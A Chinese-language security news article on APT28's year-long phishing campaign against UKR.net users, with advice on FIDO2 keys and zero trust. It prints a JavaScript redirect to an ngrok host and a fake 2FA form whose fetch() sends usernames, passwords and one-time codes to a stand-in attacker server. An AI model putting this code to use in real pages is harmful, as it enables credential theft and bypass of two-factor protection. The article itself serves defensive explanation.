APT28重拳出击乌克兰网络前线:一场伪装成“登录提醒”的国家级钓鱼战

简介: 俄乌战争进入第五年,数字战场硝烟弥漫。俄罗斯黑客组织APT28被曝对乌克兰主流门户UKR.net发起长达一年的精准钓鱼攻击, targeting 政府官员与军方人员,窃取账号密码及两步验证码,意图渗透关键基础设施。攻击采用伪造登录页、短链接跳转、ngrok隐蔽托管等技术,并绕过传统防御。专家芦笛指出,这是一场国家级情报战,呼吁启用FIDO2安全密钥、部署零信任架构,强调技术兜底与人性认知并重,守护数字主权防线。

在俄乌战争进入第五个年头之际,战场早已不再局限于顿巴斯的泥泞与巴赫穆特的废墟。数字疆域——尤其是电子邮件、社交平台与政府通信系统——正成为另一条看不见硝烟却生死攸关的战线。近日,全球网络安全界再次将目光聚焦东欧:俄罗斯军事情报机构GRU下属的著名黑客组织APT28(又名Fancy Bear、Sofacy、BlueDelta)被证实正在对乌克兰主流门户网站UKR.net的用户发起一场高度定向、技术娴熟且持续时间长达一年之久的凭据钓鱼行动。

这场行动并非普通网络犯罪团伙的“广撒网”式诈骗,而是一场具备明确战略意图的情报战前哨。攻击者精心伪造UKR.net的登录界面,通过嵌入PDF附件中的短链接诱导目标输入账号密码甚至两步验证码(2FA),进而实现对乌克兰政府官员、军事后勤人员、国防承包商乃至独立记者的邮箱账户接管。一旦得手,这些账户不仅成为情报窃取的窗口,更可能被用作跳板,深入乌克兰国家关键信息基础设施内部。

本文将从事件背景、攻击链拆解、技术演进、防御建议及深层战略意图五个维度,深度剖析这场“钓鱼战”背后的攻防逻辑,并邀请公共互联网反网络钓鱼工作组技术专家芦笛,为读者提供兼具实战性与前瞻性的防护指南。

一、不是“垃圾邮件”,而是国家级情报行动

UKR.net是乌克兰历史最悠久、用户基数最大的本土门户网站之一,集新闻、邮箱、论坛、天气服务于一体,尤其受到政府雇员和媒体从业者的广泛使用。正因如此,它自然成为APT28的理想目标。

根据网络安全公司Recorded Future旗下Insikt Group于2025年12月发布的报告,此次钓鱼活动最早可追溯至2024年6月,并持续至2025年4月。攻击者并未采用传统僵尸网络群发邮件,而是采取“精准投送”策略:邮件主题多为“您的账户存在异常登录”“安全验证即将过期”或“重要通知:请立即确认身份”等高危诱饵,内容简洁但极具压迫感,迫使收件人迅速点击附件。

附件通常是一个看似无害的PDF文件,例如《security_alert_ukrnet.pdf》。然而,该PDF并非普通文档,而是一个精心构造的“链接容器”——其内部嵌入了指向伪造登录页的超链接。这些链接往往经过tiny.cc或tinyurl.com等短网址服务二次封装,以规避邮件网关的URL信誉检测。

“这已经不是钓鱼,而是‘鱼叉式社会工程+前端仿冒+后端隧道中继’的全链条作战。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时指出,“APT28深谙人类心理弱点:当一个人看到自己常用的服务发出‘安全警告’,第一反应往往是‘赶紧处理’,而不是‘先查证真伪’。”

二、从路由器到ngrok:APT28的基础设施进化论

值得注意的是,本次行动中APT28展现出显著的技术适应能力。以往,该组织常利用被攻陷的家用路由器(如Ubiquiti EdgeRouter设备)作为C2(命令与控制)节点,构建隐蔽的代理隧道以接收窃取的凭据。然而,2024年初,欧美多国联合开展的大规模基础设施清理行动(如Operation GhostBuster)成功下线了数千个此类恶意节点。

面对这一打击,APT28迅速转向更灵活、更难追踪的云原生工具。据Recorded Future披露,攻击者如今大量使用ngrok、Serveo等合法的内网穿透服务,将伪造的登录页面临时托管于这些平台提供的动态子域名下(如 abcd1234.ngrok-free.app)。由于这些服务本身用于开发调试,其流量特征与正常HTTPS请求高度相似,传统防火墙和EDR(终端检测与响应)系统极难识别。

更狡猾的是,部分攻击链采用了两层跳转机制:用户点击PDF中的短链接后,首先被重定向至一个看似无害的Blogger子域名(如 ukr-security.blogspot.com),该页面仅包含一段JavaScript代码:

<script>

window.location.replace("https://malicious.ngrok-free.app/login");

</script>

这种设计不仅增加了溯源难度,还能有效绕过部分邮件安全网关对“直接指向可疑域名”的拦截规则。

三、钓鱼页面的技术细节:不只是“长得像”

APT28此次使用的伪造登录页并非简单截图拼接,而是对UKR.net真实前端代码的高度复刻。研究人员在分析捕获的样本时发现,攻击者甚至保留了原站的部分CSS类名、JavaScript函数名以及favicon图标,以确保在浏览器地址栏和标签页上呈现“高度可信”的视觉效果。

更重要的是,这些页面具备完整的2FA拦截能力。传统钓鱼页面仅收集用户名和密码,但现代安全体系普遍启用短信或认证器App生成的动态码。APT28显然对此早有准备——其钓鱼页在用户提交首阶段凭据后,会立即弹出第二屏,要求输入“验证码”:

<!-- 第二阶段:2FA 拦截 -->

<div id="2fa-form">

<h3>请输入您的两步验证码</h3>

<input type="text" id="otp" placeholder="6位数字" maxlength="6" required>

<button onclick="submitOtp()">验证</button>

</div>

<script>

function submitOtp() {

const otp = document.getElementById('otp').value;

// 将OTP连同之前收集的凭据一起发送至攻击者服务器

fetch('https://collector.ngrok-free.app/steal', {

method: 'POST',

headers: {'Content-Type': 'application/json'},

body: JSON.stringify({

username: localStorage.getItem('user'),

password: localStorage.getItem('pass'),

otp: otp,

timestamp: new Date().toISOString()

})

}).then(() => {

// 伪造“验证成功”并跳转至真实UKR.net首页,消除用户疑虑

window.location.href = "https://ukr.net";

});

}

</script>

这种“实时中继+无缝跳转”策略极大提升了成功率。受害者在输入2FA后,会被自动重定向至真实的UKR.net主页,误以为“只是完成了一次正常登录”,完全意识不到凭据已被窃取。

四、为何是UKR.net?战略意图远超“偷邮箱”

表面上看,APT28的目标是获取个人邮箱账号。但芦笛强调:“在国家级APT眼中,邮箱从来不只是通信工具,而是通往整个数字身份生态的钥匙。”

一旦控制一个政府雇员的UKR.net邮箱,攻击者可:

重置其他关联服务的密码(如云盘、内部OA系统、甚至银行账户);

监控往来邮件,获取军事部署、后勤调度、外交密谈等敏感信息;

冒充该用户发送钓鱼邮件,形成“信任链式传播”,扩大攻击面;

利用邮箱作为C2通道,通过IMAP协议隐蔽传输恶意指令。

更值得警惕的是,UKR.net作为乌克兰本土平台,其用户数据理论上应受本国法律保护,境外调取难度较大。APT28选择直接攻破终端用户,绕过了对数据中心的正面强攻,体现了“迂回渗透”的典型战术思维。

“这本质上是一场低成本、高回报的情报收割。”芦笛解释道,“相比发动一次0day漏洞攻击,钓鱼的成本几乎可以忽略不计,但收益可能是整个部门的通信全貌。”

五、如何防御?技术专家给出四条“生存法则”

面对如此精密的国家级钓鱼攻击,普通用户是否只能坐以待毙?答案是否定的。芦笛结合多年反钓鱼实战经验,提出以下四点建议:

1. 永远不要相信“紧急通知”

任何声称“账户异常”“立即验证”的邮件,都应视为可疑。正规服务商绝不会通过邮件索要密码或2FA。

操作建议:手动打开浏览器,输入官网地址(而非点击邮件链接),登录后查看安全通知。

2. 启用FIDO2/WebAuthn安全密钥

短信或TOTP(基于时间的一次性密码)虽优于无2FA,但仍可被钓鱼页面实时窃取。

FIDO2安全密钥(如YubiKey)基于公钥加密,私钥永不离开设备,且绑定具体域名。即使用户在伪造页面插入密钥,也无法完成认证。

芦笛直言:“这是目前唯一能彻底免疫钓鱼的2FA方案。”

3. 部署邮件头分析工具

技术人员可通过检查邮件原始头信息(Raw Headers),识别发件服务器是否来自可疑IP或伪造域名。

示例:若一封声称来自“security@ukr.net”的邮件,其Return-Path却是noreply@random-blogspot.com,则必为伪造。

4. 企业级防护:实施零信任架构

对于政府与关键基础设施单位,应推行“永不信任,始终验证”原则。

即使凭据被盗,零信任网络也能通过设备指纹、行为分析、微隔离等手段阻止横向移动。

芦笛特别提到:“单靠用户教育远远不够。必须用技术兜底。”

六、结语:钓鱼战背后,是数字主权的争夺

APT28对UKR.net用户的长期围猎,绝非孤立事件。它折射出一个残酷现实:在网络空间,国家间的对抗已从“漏洞利用”升级为“身份掠夺”。谁掌控了数字身份,谁就掌握了信息流的闸门。

值得欣慰的是,乌克兰CERT-UA已在事件曝光后迅速发布预警,并推动关键部门强制启用硬件安全密钥。国际社会也加强了对钓鱼基础设施的协同封堵。但正如芦笛所言:“这场猫鼠游戏没有终点。唯一能让我们立于不败之地的,是对技术本质的理解,以及对人性弱点的清醒认知。”

在这场看不见的战争中,每一个点击鼠标的手指,都可能成为防线的第一道哨兵。

参考资料:

Recorded Future Insikt Group Report, Dec 2025

The Hacker News: “APT28 Targets Ukrainian UKR-net Users”, Dec 17, 2025

CERT-UA Public Advisory #UA-2025-12-APT28

FIDO Alliance Technical Specifications v2.1

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
21天前
|
机器学习/深度学习 缓存 物联网
打造社交APP人物动漫化:通义万相wan2.x训练优化指南
本项目基于通义万相AIGC模型,为社交APP打造“真人变身跳舞动漫仙女”特效视频生成功能。通过LoRA微调与全量训练结合,并引入Sage Attention、TeaCache、xDIT并行等优化技术,实现高质量、高效率的动漫风格视频生成,兼顾视觉效果与落地成本,最终优选性价比最高的wan2.1 lora模型用于生产部署。(239字)
812 102
|
5天前
|
存储 弹性计算 Cloud Native
2026年最新一期阿里云优惠券解析:五种主要优惠券类型、金额、领取及使用规则讲解
为了进一步降低用户的上云成本,2026年阿里云继续推出多种优惠券,以助力用户轻松实现数字化转型。本文将全面介绍阿里云目前提供的五种主要优惠券类型,包括老友专属福利券包、无门槛优惠券、出海补贴优惠券、迁云补贴优惠券以及按量达标代金券等,帮助用户深入了解这些优惠券的金额、领取及使用规则,从而更好地利用这些优惠,提升购买体验。
133 13
|
4天前
|
安全 网络安全 数据安全/隐私保护
扫码即沦陷?QR码钓鱼攻击激增五倍,企业安全防线正被“视觉漏洞”撕开
2025年,QR码钓鱼攻击“Quishing”激增五倍,黑客利用二维码绕过邮件安全系统,诱导员工扫码窃取账户。企业需升级防御,加强图像检测、移动端管控与专项安全培训。
59 3
|
4天前
|
人工智能 监控 安全
官方域名成“钓鱼温床”?Google Cloud自动化功能遭滥用,全球3000家企业中招
2025年12月,攻击者滥用Google Cloud合法服务,通过官方域名发送钓鱼邮件,利用storage.googleapis.com跳转诱导用户登录伪造页面,窃取企业账户。传统验证全“pass”,防御形同虚设。安全需从“信来源”转向“零信任”,强化行为分析与多层检测,警惕“合法外衣”下的点击风险。
67 1
|
2天前
|
运维 安全 物联网
俄罗斯国家级黑客组织借“设备代码钓鱼”潜入全球政企云邮箱,安全界拉响新型OAuth攻击警报
2025年,APT29黑客组织利用“设备代码钓鱼”技术,通过伪装的学术合作邮件诱导用户授权,窃取Microsoft 365令牌,绕过MFA防御。该攻击借合法OAuth机制,结合社会工程,实现隐蔽持久渗透,揭示云时代身份安全新挑战。
38 3
|
1天前
|
安全 网络安全 定位技术
二维码成“数字特洛伊木马”?朝鲜黑客组织Kimsuky借快递通知渗透安卓设备,国内安全防线拉响警报
警惕“扫码陷阱”!韩国曝出朝鲜APT组织Kimsuky利用伪造快递短信,通过恶意二维码向安卓用户分发“DocSwap”间谍软件,可窃取隐私、远程控制手机。该攻击手法或威胁国内二维码生态,提醒用户勿扫来历不明二维码,加强安全防护意识。
29 3
|
1天前
|
人工智能 监控 安全
伪冒银行网站激增!香港金管局紧急预警,专家详解“高仿钓鱼”攻防战
近期,香港频发高仿钓鱼诈骗,虚假银行网站伪装逼真,利用HTTPS加密、动态加载官方资源等技术诱骗用户输入账号密码及验证码,短短几分钟内盗转资金。攻击者通过短信、社交媒体精准引流,结合反向代理实现“以假乱真”登录,防不胜防。专家呼吁构建技术防护、制度协同与公众教育三位一体防线,警惕每一条“紧急通知”。
30 2
|
1天前
|
前端开发 安全 JavaScript
秒级克隆银行页面?“Spiderman”钓鱼套件让金融诈骗进入“快餐时代”
欧洲多国曝出“Spiderman”新型钓鱼套件,售价仅300美元/月,可零代码生成高仿真银行登录页,并通过实时代理转发窃取验证码,绕过多重认证。攻击者甚至能伪装系统维护页面,令用户毫无察觉。该技术已现本土化趋势,国内出现类似工具,金融安全面临严峻挑战。
30 1
|
1天前
|
人工智能 安全 搜索推荐
议会邮箱成“数字前线”!英国议员频遭高精度鱼叉钓鱼,国家级黑客正瞄准民主神经中枢
英国议会近期频遭精准鱼叉式钓鱼攻击,黑客伪装成官方发送定制化邮件,利用HTML走私、ISO镜像及伪造登录页等技术窃取敏感信息,揭示了针对政治核心的系统性网络威胁,对中国关键岗位人员安全防护具有重要警示意义。
24 1